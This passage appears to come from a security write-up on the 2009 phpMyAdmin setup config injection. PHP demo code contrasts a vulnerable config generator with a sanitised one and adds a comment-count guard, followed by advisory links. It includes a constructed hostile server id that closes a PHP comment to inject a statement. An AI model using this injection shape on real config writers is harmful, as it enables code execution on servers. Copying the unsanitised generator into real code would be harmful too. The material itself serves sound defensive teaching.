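    return (string) preg_replace('/[^A-Za-z0-9_]/', '_', $s);
}

/**
 * Builds the servers block of the config file. With $sanitize = false the array
 * key $id, the verbose name and each option key reach the output unchanged, which
 * is the defect described on this page; with $sanitize = true all three are
 * filtered before interpolation (the id is what the first quoted patch missed,
 * since it filtered $k inside a loop whose control variable is $id).
 */
function buildServersBlock(array $servers, bool $sanitize): string
{
    $filter = $sanitize ? 'sanitizeIdentifier' : fn(string $s): string => $s;
    $ret = "/* Servers configuration */\n\$i = 0;\n\n";
    foreach ($servers as $id => $server) {
        $id   = $filter((string) $id);
        $name = $filter((string) ($server['verbose'] ?? 'Server'));
        $ret .= '/* Server: ' . $name . " [$id] */\n" . '$i++;' . "\n";
        foreach ($server as $k => $v) {
            $k = $filter((string) $k);
            // var_export() quotes the value; the key is the part the fix had to handle.
            $ret .= "\$cfg['Servers'][\$i]['$k'] = " . var_export($v, true) . ";\n";
        }
        $ret .= "\n";
    }
    return $ret . "/* End of servers configuration */\n";
}

/**
 * Structural sanity check for a generated config: tokenize it and count comment
 * tokens. This generator emits exactly one comment per server plus a header and a
 * footer, and any value that closes a comment early changes that count, because
 * the trailing "[id] */" then forms a second comment or is swallowed by a new one.
 * It checks this generator's output shape only; it is not a general injection scanner.
 */
function countComments(string $phpBody): int
{
    $n = 0;
    foreach (token_get_all("<?php\n" . $phpBody) as $tok) {
        if (is_array($tok) && ($tok[0] === T_COMMENT || $tok[0] === T_DOC_COMMENT)) {
            $n++;
        }
    }
    return $n;
}

/** Runs both generators over a constructed hostile server id and reports the results. */
function demo(): array
{
    // Constructed hostile id in the shape the post describes: close the comment,
    // run a statement, reopen a comment so the rest of the line stays valid PHP.
    $hostileId = 'bleh */ echo "injected"; /*';
    $servers = [
        $hostileId => ['verbose' => 'main', 'host' => 'localhost', 'auth_type' => 'cookie'],
    ];
    $vulnerable = buildServersBlock($servers, false);
    $hardened   = buildServersBlock($servers, true);

    return [
        'expected_comments'    => count($servers) + 2,      // header + one per server + footer
        'vulnerable_comments'  => countComments($vulnerable),
        'hardened_comments'    => countComments($hardened),
        'hardened_server_line' => explode("\n", $hardened)[3],
    ];
}

if (PHP_SAPI === 'cli') {
    print_r(demo());
}
```

Run it with `php` on the command line and compare the three counts: for the vulnerable build the comment count differs from `expected_comments` because the hostile id splits the server comment in two, while the hardened build matches it and `hardened_server_line` shows the id reduced to letters, digits and underscores inside an intact comment. The whitelist is the actual fix; the token count is a cheap deploy-time guard a maintainer can keep around for any config writer that interpolates untrusted strings into comments, and it depends on the generator producing a known, fixed comment layout.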
References
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_3_1_3/phpMyAdmin/setup/lib/ConfigFile.class.php?r1=12248&r2=12301&pathrev=12342
- http://secunia.com/advisories/34727
- http://secunia.com/advisories/34741
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php
- http://www.securityfocus.com/bid/34526
- http://www.vupen.com/english/advisories/2009/1045
- https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00442.html
- https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00452.html